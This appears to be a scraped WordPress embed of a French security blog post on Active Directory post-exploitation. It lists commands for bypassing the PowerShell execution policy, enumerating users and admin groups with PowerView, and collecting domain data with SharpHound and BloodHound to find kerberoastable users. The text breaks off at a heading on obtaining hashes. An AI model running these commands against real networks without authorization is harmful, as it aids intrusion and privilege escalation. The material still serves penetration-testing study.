1.0Sécuriser votre sitehttps://www.searchevolution.com/securityGermainhttps://www.searchevolution.com/security/author/germain/rich600338<blockquote class="wp-embedded-content" data-secret="Yp7s2Gcv8F"><a href="https://www.searchevolution.com/security/2022/03/15/post-exploitation/">Post-Exploitation</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://www.searchevolution.com/security/2022/03/15/post-exploitation/embed/#?secret=Yp7s2Gcv8F" width="600" height="338" title="« Post-Exploitation » — Sécuriser votre site" data-secret="Yp7s2Gcv8F" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script type="text/javascript"> /* <![CDATA[ */ /*! This file is auto-generated */ !function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document); /* ]]> */ </script> Post-Exploitation Powerview est un script de la suite powershell empire qui peut etre utilisé pour l’énumération après que vous ayez obtenu l’accèes au système. Vous trouvez les scripts utilisés dans cet archive powershell -ep bypass . .PowerView.ps1 Get-NetUser | select cn Get-NetGroup -GroupName *admin* Énumération avec Bloodhound apt-get install bloodhound neo4j console (neo4j:neo4j) bloodhound powershell -ep bypass . .SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip Vous pouvez drag&drop le fichier loot.zip obtenu dans bloodhound. Voici les requêtes que vous pouvez exécuter dans bloodhound Vous pouvez facilement voir les usagers “kerberoastable” ou les administrateurs de domaine. Obtenir les hashes avechttps://www.searchevolution.com/security/wp-content/uploads/2021/07/Requete_Domaine.png